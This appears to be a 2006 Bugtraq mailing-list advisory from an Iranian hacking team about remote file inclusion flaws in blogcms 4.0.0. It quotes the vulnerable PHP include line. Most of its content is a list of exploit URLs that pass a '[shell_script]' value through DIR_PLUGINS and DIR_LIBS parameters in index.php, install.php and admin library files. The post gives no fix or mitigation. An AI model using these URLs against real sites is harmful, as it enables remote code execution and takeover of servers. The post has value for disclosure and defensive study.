[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20061116084846.7689.qmail@securityfocus.com>
Date: 16 Nov 2006 08:48:46 -0000
From: the_3dit0r@...oo.com
To: bugtraq@...urityfocus.com
Subject: blogcms => 4.0.0 Remote File Include
"""""""""""""""""""""""""""""""""""""""""""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""
Xmor$ DigitaL Hacking TeaM
# blogcms => 4.0.0 Remote File Include Vulnerabilities
# Script.............. : blogcms
# Discovered by.... : the_Edit0r
# Location .......... : Iran
# Class.............. : Remote
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r
# D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
# ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
# Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )
# Site download : devblog.outofthebloo.com
# CodE :
require_once('themes/' . $blog_theme . '/user_style.php');
# Expl0itS :
http://Site/[path]/index.php?DIR_PLUGINS=[shell_script]
http://Site/[path]/install.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]
# Contact me : the_3dit0r[at]Yahoo[dot]coM
Powered by blists - more mailing lists